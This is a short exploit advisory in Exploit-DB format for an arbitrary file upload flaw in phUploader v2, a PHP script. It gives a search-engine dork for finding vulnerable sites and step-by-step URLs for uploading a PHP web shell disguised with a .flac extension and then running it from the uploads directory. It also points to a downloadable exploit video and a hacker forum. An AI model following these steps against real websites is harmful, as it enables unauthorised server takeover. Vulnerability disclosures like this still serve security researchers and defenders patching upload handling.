phUploader 2 - Arbitrary File Upload

EDB-ID:

10574




Platform:

PHP

Date:

2009-12-20


# Exploit Title: phUploader Remote File Upload Vulnerability
# Date: 20-12-2009
# Author: wlhaan-hacker
#
# Version: v2
# CVE : [N/A]

==========================================================================

~ Script Name : phUploader)
~ Language : php
~
~ email: iit@hotmail.com
~
============================================================

Dork : Powered By phUploader



============================================================
Exploit :



http://{target}/script path/upload.php

chang shell

shell.php.flac

go to shell

http://{target}/script path/uploads/shell.php.flac

Exploit viduo
Download:
http://filaty.com/f/912/99431/up5.rar.html
============================================================

thank you for

shooq hacker
============================================================

www.sa-hacker.com/vb
============================================================